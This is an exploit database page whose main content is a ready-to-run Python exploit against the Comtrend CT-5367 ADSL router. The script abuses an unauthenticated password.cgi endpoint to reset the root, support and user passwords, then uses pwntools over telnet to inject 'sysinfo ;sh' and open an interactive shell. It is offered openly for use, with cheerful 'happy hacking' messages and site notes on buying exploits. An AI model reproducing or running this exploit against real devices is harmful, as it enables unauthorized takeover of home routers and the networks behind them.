0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
COMTREND ADSL Router CT-5367 - Remote Code Execution Exploit
# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute # Date: 11-12-2017 # Exploit Author: TnMch # Software Link : null # Type : HardWare # Risk of use : High # Type to use : Remote 1. Description Any user can edit all users password and execute remote code directly without have access 2. Proof of Concept request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi <form> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="120">Username:</td> <td><select name='userName' size="1"> <option value="0"> <option value="1">root <!-- admin --> <option value="2">support <!-- support --> <option value="3">user <!-- user --> </select></td> </tr> <tr> <td>Old Password:</td> <td><input name='pwdOld' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>New Password:</td> <td><input name='pwdNew' type="password" size="20" maxlength="16"></td> </tr> <tr> <td>Confirm Password:</td> <td><input name='pwdCfm' type='password' size="20" maxlength="16"></td> </tr> </table> <br> <center><input type='button' onClick='btnApply()' value='Save/Apply'></center> </form> 3 .exploit #!/usr/bin/env python import platform import requests import base64 url = "http://192.168.1.1/" ''' first check default gateway ''' r = requests.get(url,allow_redirects=True) resp = r.content '''Check resp''' if 'Authorization' not in resp: exit("[-]Invalid host !! ") ''' Change password ''' again = True while again: print "Which User" print "(root | support | user )" user = raw_input('user : ').split()[0] if user not in ("root","support","user"): exit("[-] No user with this name !! ") print "[+] Update password ",user password = raw_input('new password : ').split()[0] print "[+] Update new password ['",password,"']" if user == "root": url +="password.cgi?sysPassword="+password if user == "support": url +="password.cgi?sptPassword="+password if user == "user": url +="password.cgi?usrPassword="+password pass_b64 = password.encode('base64').split()[0] r2 = requests.get(url,allow_redirects=True) resp2 = r2.content ''' Check update ''' if pass_b64 in resp2: print "[+] Password for user : ",user," updated!" print "Happy hacking :D, enjoy" else: print "[-] Something Wrong , please check again! " y_n = raw_input('Do you want again? :D (y/n) : ').split()[0] if 'n'!= y_n and 'y' != y_n: exit('bad input :(') if y_n == 'n': print "Go Go Go :D ,No Time for you Mr.Robot" shell_yn= raw_input("Do you want shell? (y/n) :D : ").split()[0] if shell_yn !='n': sys = platform.system() if sys =="Windows": exit("Sorry only on Linux or Mac Os") from pwn import * target = "192.168.1.1" port = 23 p = remote(target,port) p.recvuntil("Login:") p.sendline(user) p.recvuntil("Password:") p.sendline(password) p.sendline("sysinfo ;sh") p.interactive() again = False # 0day.today [2024-09-28] #